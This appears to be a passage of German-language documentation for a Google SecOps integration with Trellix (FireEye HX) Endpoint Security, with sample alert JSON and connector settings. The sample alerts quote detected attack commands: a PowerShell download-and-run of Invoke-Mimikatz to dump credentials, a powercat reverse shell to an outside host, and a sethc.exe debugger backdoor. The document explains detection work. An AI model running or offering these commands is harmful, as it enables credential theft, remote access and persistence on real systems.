"processEvent/md5": "cda48fc75952ad12d99e526d0b6bf70a",
"processEvent/processCmdLine": "powershell.exe \"iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\" "
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 3
},
"url": "/hx/api/v3/alert_groups/4532f4d8d50ab50a7830e2823ac488fd",
"created_at": "2020-12-10T09:26:56.056Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
},
{
"_id": "e9f4d7baaa362d9d5d0b6e053ba0d44d",
"assessment": "[Registry key event] EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"file_full_path": "",
"first_event_at": "2020-12-10T08:04:09.521Z",
"last_event_at": "2020-12-10T09:26:14.114Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"event_at": "2020-12-10T09:26:14.114+00:00",
"matched_at": "2020-12-10T09:26:56+00:00",
"reported_at": "2020-12-10T09:27:08.735+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 2
},
"url": "/hx/api/v3/alert_groups/e9f4d7baaa362d9d5d0b6e053ba0d44d",
"created_at": "2020-12-10T08:04:54.740Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "2npvcLf_arxPaH717hQZ9g==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups"
}
Fall-Repository
| Ergebnistyp | Wert/Beschreibung | Typ |
|---|---|---|
| Ausgabemeldung* | Die Aktion darf nicht fehlschlagen oder die Ausführung eines Playbooks stoppen. „Bestätigungsstatus für alle Alarmgruppen wurde aktualisiert“ Wenn einige erfolgreich und einige nicht erfolgreich sind (die Anzahl der angegebenen IDs ist größer als die Gesamtzahl): „Successfully fetched alerts for the following alert group IDs: {succesfull_alert_groups_ids}“ Wenn keine Details zur Benachrichtigungsgruppe abgerufen wurden: „Für keine der angegebenen Benachrichtigungsgruppen-IDs konnten Benachrichtigungen abgerufen werden. Bitte überprüfen Sie die angegebenen IDs und versuchen Sie es noch einmal.“ Die Aktion sollte fehlschlagen und die Ausführung eines Playbooks beenden: |
Allgemein |
Host-Benachrichtigungsgruppen abrufen
Beschreibung
Listet Alarmgruppen auf, die sich auf einen Host in Trellix Endpoint Security beziehen. Unterstützte Einheiten: Hostname, IP-Adresse.
Parameter
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Bestätigungsfilter | DDL | ALLE Nur bestätigt Nur nicht quittierte |
Nein | Geben Sie an, ob Sie alle Benachrichtigungsgruppen oder nur bestätigte/nicht bestätigte zurückgeben möchten. |
| Maximale Anzahl zurückzugebender Benachrichtigungsgruppen | Ganzzahl | 20 | Nein | Geben Sie an, wie viele Benachrichtigungsgruppen pro Entität zurückgegeben werden sollen. Standard: 20. |
Ausführen am
Diese Aktion wird für die folgenden Einheiten ausgeführt:
- IP-Adresse
- Hostname
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
{
"_id": "6d9a68f2a78f8d983bd3c0f4556785e6",
"assessment": "[Heur.BZC.ONG.Cheetah.3.1C89233F]",
"file_full_path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"first_event_at": "2021-07-01T09:44:18.809Z",
"last_event_at": "2021-07-01T09:44:18.809Z",
"dispositions": [],
"source": "MAL",
"has_fp_disposition": false,
"last_alert": {
"_id": 812,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"event_at": "2021-07-01T09:44:18.809+00:00",
"matched_at": "2021-07-01T09:44:18.809+00:00",
"reported_at": "2021-07-01T09:44:20.353+00:00",
"source": "MAL",
"resolution": "QUARANTINED",
"decorators": [],
"md5values": [
"36be03ea88f7d1effcafeeb65e0e1e57"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/812",
"condition": null,
"event_id": null,
"event_type": null,
"event_values": {
"system-data": {
"xmlns": "http://www.fireeye.com/antimalware-alert",
"xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",
"xsi:schemaLocation": "http://www.fireeye.com/antimalware-alert AM-alert.xsd",
"alert-version": "3",
"correlation-id": "d01e8ea6-4d34-4005-8482-3ccc026e11ea",
"timestamp": "2021-07-01T09:44:18.809Z",
"product-version": "32.36.0",
"engine-version": "11.0.1.19",
"content-version": "7.86346",
"mg-engine-version": "32.30.0.8460",
"mg-content-version": "25",
"whitelist-schema-version": "1.0.0",
"whitelist-content-version": "1.32.1"
},
"os-details": {
"$": {
"name": "windows",
"version": "10.0.14393",
"patch": "0",
"os-arch": "64-bit",
"os-language": "en-US"
}
},
"scan-type": "oas",
"scanned-object": {
"scanned-object-type": "file-event",
"file-event": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"actor-process": {
"pid": "1268",
"path": "C:\\Windows\\System32\\xcopy.exe",
"user": {
"username": "",
"domain": ""
}
},
"sub-type": "FILE_OPERATION_CLOSED"
}
},
"detections": {
"detection": [
{
"engine": {
"engine-type": "av",
"engine-version": "11.0.1.19",
"content-version": "7.86346"
},
"infected-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"infection": {
"confidence-level": "high",
"infection-type": "malware",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F"
},
"action": {
"actioned-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"requested-action": "clean",
"applied-action": "quarantine",
"result": "success",
"error": "0",
"reboot-required": "false"
}
}
]
},
"scan-statistics": {
"total-scan-time-in-ms": "12227"
}
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/6d9a68f2a78f8d983bd3c0f4556785e6",
"created_at": "2021-07-01T09:44:23.726Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F",
"detected_by": "malware_file_access_scan",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
},
{
"_id": "0043aa34dea99c23996c2f16291cdb4e",
"assessment": "[Process powershell.exe started] POWERCAT (UTILITY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2021-07-01T09:41:50.428Z",
"last_event_at": "2021-07-01T09:41:50.428Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 811,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"condition": {
"_id": "KBvTAC_L_GiI9BZbph2GoA==",
"url": "/hx/api/v3/conditions/KBvTAC_L_GiI9BZbph2GoA=="
},
"event_at": "2021-07-01T09:41:50.428+00:00",
"matched_at": "2021-07-01T09:43:29+00:00",
"reported_at": "2021-07-01T09:44:09.339+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"097ce5761c89434367598b34fe32893b"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/811",
"event_id": 11311494,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2021-07-01T09:41:50.428Z",
"processEvent/eventType": "start",
"processEvent/pid": 3676,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 2496,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2021-07-01T09:41:50.428Z",
"processEvent/md5": "097ce5761c89434367598b34fe32893b",
"processEvent/processCmdLine": "powershell -Exec Bypass \". \\\"C:\\TMP\\nc.ps1\\\";powercat -c www.googleaccountsservices.com -p 80 -t 2 -e cmd\""
},
"multiple_match": "Multiple Indicators Matched.",
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/0043aa34dea99c23996c2f16291cdb4e",
"created_at": "2021-07-01T09:44:13.744Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "KBvTAC_L_GiI9BZbph2GoA==",
"detected_by": "ioc_engine",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
Fall-Repository
| Ergebnistyp | Wert/Beschreibung | Typ |
|---|---|---|
| Ausgabemeldung\* | Die Aktion darf nicht fehlschlagen oder die Ausführung eines Playbooks stoppen: Wenn keine Daten für eine(is_success = true) verfügbar sind: „Die Aktion konnte keine Benachrichtigungsgruppen für die folgenden Entitäten in Trellix Endpoint Security abrufen: {entity.identifier}“. Wenn keine Daten für alle verfügbar sind (is_success=false): „No alert groups were found for the provided entities in Trellix Endpoint Security“ (Für die angegebenen Entitäten in Trellix Endpoint Security wurden keine Alarmgruppen gefunden). Die Aktion sollte fehlschlagen und die Ausführung eines Playbooks beenden: |
Allgemein |
| Tabelle „Fall-Repository“ | Spalten:
|
Entität |
Connectors
FireEye HX Alerts Connector
Beschreibung
Der Google SecOps SOAR-Connector für Trellix Endpoint Security-Benachrichtigungen erfasst Benachrichtigungen, die auf dem Trellix Endpoint Security-Server generiert werden.
Der Connector stellt regelmäßig eine Verbindung zum Trellix Endpoint Security API-Serverendpunkt her und ruft eine Liste der für einen bestimmten Zeitraum generierten Benachrichtigungen ab. Wenn neue Benachrichtigungen vorhanden sind, erstellt der Connector Google SecOps SOAR-Benachrichtigungen basierend auf den Trellix Endpoint Security-Benachrichtigungen und speichert den Connector-Zeitstempel als die Zeit der letzten erfolgreich aufgenommenen Benachrichtigung. Bei der nächsten Ausführung des Connectors werden über die Trellix Endpoint Security API nur Warnungen abgefragt, die ab dem Zeitstempel (Zeitstempel plus einem „technischen“ Offset, damit der Connector nicht „hängen bleibt“) erstellt wurden. Wenn keine neuen Benachrichtigungen gefunden werden, wird die aktuelle Ausführung beendet.
API-Berechtigungen
Der Trellix Endpoint Security Alerts Connector verwendet dieselben API-Authentifizierungsmethoden und Berechtigungen wie die vorhandene FireEye-Integration. Damit er mit FireEye-Benachrichtigungen funktioniert, muss das Konto, das für die Integration verwendet wird, die Rolle „API Analyst“ oder „API Admin“ haben.
FireEye HX Alerts Connector in Google SecOps konfigurieren
Eine ausführliche Anleitung zum Konfigurieren eines Connectors in Google SecOps finden Sie unter Connector konfigurieren.
Connector-Parameter
Verwenden Sie die folgenden Parameter, um den Connector zu konfigurieren:
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Produktfeldname | String | ProductName | Ja | Von der Plattform definierte Beschreibung. Das Feld ist unveränderlich. |
| Name des Ereignisfelds | String | AlertName | Ja | Von der Plattform definierte Beschreibung. Das Feld ist unveränderlich. |
| Name des Umgebungsfelds | String | "" | Nein | Beschreibt den Namen des Felds, in dem der Umgebungsname gespeichert ist. Wenn das Feld „environment“ nicht gefunden wird, ist die Umgebung „“. |
| Regex-Muster für Umgebung | String | .* | Nein | Ein regulärer Ausdruck, der auf den Wert im Feld „Name des Umgebungsfelds“ angewendet wird. Der Standardwert ist „.*“, um alle Werte zu erfassen und unverändert zurückzugeben. Ermöglicht es dem Nutzer, das Feld „Umgebung“ über Regex-Logik zu bearbeiten. Wenn das reguläre Ausdrucksmuster null oder leer ist oder der Umgebungswert null ist, ist das endgültige Umgebungsergebnis „“. |
| Zeitlimit für Script (Sekunden) | Ganzzahl | 180 | Ja | Zeitlimit für den Python-Prozess, in dem das aktuelle Skript ausgeführt wird. |
| API-Stamm | String | https://x.x.x.x:<port> | Ja | Trellix Endpoint Security Server – API-Stamm-URL |
| Nutzername | String | – | Ja | Trellix Endpoint Security-Nutzer für die Authentifizierung |
| Passwort | Passwort | – | Ja | Trellix Endpoint Security-Nutzerpasswort für die Authentifizierung |
| SSL überprüfen | Kästchen | Aktiviert | Ja | Falls angegeben, prüft der Connector, ob Trellix Endpoint Security mit einem gültigen SSL-Zertifikat konfiguriert ist. Wenn das Zertifikat ungültig ist, gibt der Connector einen Fehler zurück. |
| Abweichungszeit in Stunden | Ganzzahl | 24 | Ja | Rufe Benachrichtigungen ab, die bis zu X Stunden zurückliegen. |
| Maximale Anzahl an Benachrichtigungen pro Zyklus | Ganzzahl | 25 | Ja | Gibt an, wie viele Benachrichtigungen bei einem Connector-Lauf verarbeitet werden sollen. |
| Benachrichtigungstyp | String | active_threat | Nein | Geben Sie an, welche Trellix Endpoint Security-Benachrichtigungstypen aufgenommen werden sollen. Standardmäßig ist „active_threat“ festgelegt, um Benachrichtigungen im Status „ALERT“ und „QUARANTINED“/„partial_block“ zurückzugeben. Ein weiterer gültiger Parameter ist ALERT. Damit werden nur offene Benachrichtigungen zurückgegeben. |
| Zulassungsliste als Sperrliste verwenden | Kästchen (checkbox) | Deaktiviert | Ja | Wenn diese Option aktiviert ist, wird die Zulassungsliste als Sperrliste verwendet. |
| Proxyserveradresse | IP_OR_HOST | – | Nein | Proxyserver für die Verbindung. |
| Proxyserver-Nutzername | String | – | Nein | Nutzername für den Proxyserver. |
| Proxyserver-Passwort | Passwort | – | Nein | Passwort für den Proxyserver. |
Connector-Regeln
- Blacklist: Blacklist-Regeln sollten unterstützt werden, der Connector verwendet jedoch standardmäßig die Whitelist-Logik.
- Regeln für die Zulassungsliste: Werden standardmäßig verwendet.
- Proxy-Unterstützung: Der Connector unterstützt Proxys.
- Standard-ConnectorRules
| RuleType(Whitelist \ Blacklist) | RuleName (String) |
|---|---|
| WhiteList | Geben Sie in diesem Abschnitt an, welche Benachrichtigungen basierend auf Attributen für Benachrichtigungsquelle und ‑untertyp aufgenommen werden sollen, z. B. „IOC“ für Indikatorbenachrichtigungen, „MAL AV“, um nur Malware-Benachrichtigungen mit dem Untertyp „AV“ aufzunehmen, oder „MAL“, um alle Malware-Benachrichtigungen unabhängig vom Untertyp aufzunehmen. Wenn Sie alle Benachrichtigungen aufnehmen möchten, entfernen Sie alle Einträge aus dem Abschnitt „Whitelist“. |
Benötigen Sie weitere Hilfe? Antworten von Community-Mitgliedern und Google SecOps-Experten erhalten